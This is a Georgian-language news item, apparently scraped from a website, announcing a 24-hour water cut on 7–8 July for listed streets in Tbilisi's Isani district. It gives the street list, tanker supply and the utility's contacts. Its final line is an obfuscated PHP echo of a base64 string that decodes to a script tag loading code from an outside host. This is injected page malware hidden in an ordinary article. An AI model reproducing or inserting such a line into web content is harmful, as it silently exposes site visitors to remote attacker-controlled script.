celsiusi
ავერსი საქკაბელი
„ჯორჯიან უოთერ ენდ ფაუერის“ ინფორმაციით, 7 ივლისს ისნის რაიონის რამდენიმე ქუჩას წყალმომარაგება 24 საათით შეეზღუდება.
 
კომპანიის ცნობით, ქეთევან დედოფლის გამზირზე წყალმომარაგების ახალ ქსელზე გადაერთებით სამუშაოებს ატარებენ.
 
„ხვალ, 7 ივლისს, „ჯორჯიან უოთერ ენდ ფაუერი“ ქეთევან დედოფლის გამზირის სრული რეაბილიტაციის ფარგლებში წყალსადენის ახალ ქსელზე გადაერთებით სამუშაოებს ჩაატარებს. წყალმომარაგების სტაბილურობისთვის ასევე დამონტაჟდება ჩამკეტ-მარეგულირებელი ურდულები.
 
კომპანიის ტექნიკური ჯგუფები სამუშაოებს 24-საათიან ინტენსიურ რეჟიმში შეასრულებენ.
 
აღნიშნულთან დაკავშირებით აუცილებელია მაგისტრალური ქსელის წყლისგან დაცლა, რის გამოც ხვალ, 7 ივლისს, 13:00 საათიდან 8 ივლისის 13:00 საათამდე წყალმომარაგება შეეზღუდება:
 
ისნის რაიონში: ქეთევან დედოფლის გამზირის N37-65; N40-90, ბოჭორმის, იალბუზის, ლუსინიანის, კაჩინსკის, 300 არაგველის, შავსოფლის, ბოდბის, არბორშიკის, ზახაროვის, დოლაბაურის, პატარძეულის, კაკულიას, უჯარმის, ფორაქიშვილ-სარაჯიშვილის, გელოვანის და ახვლედიანის ქუჩებს.
 
„ჯორჯიან უოთერ ენდ ფაუერი“ ბოდიშს უხდის მომხმარებლებს შექმნილი დისკომფორტისთვის. სამუშაოების მიმდინარეობისას, წყალმომარაგების სრულად აღდგენამდე კომპანია მოსახლეობას წყალს ცისტერნებით მიაწვდის.
 
წყალმომარაგების შეზღუდვისა და აღდგენის შესახებ ინფორმაციას, ჯორჯიან უოთერ ენდ ფაუერი აბონენტებს წინასწარ, SMS-შეტყობინების სახით უგზავნის. დეტალური ინფორმაციის მოძიება შესაძლებელია კომპანიის ცხელი ხაზის – 2 93 11 11, „ფეისბუქისა“ და ვებგვერდის მეშვეობით – http://www.gwp.ge“, – აცხადებენ კომპანიაში.
 
 
 
 
665
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");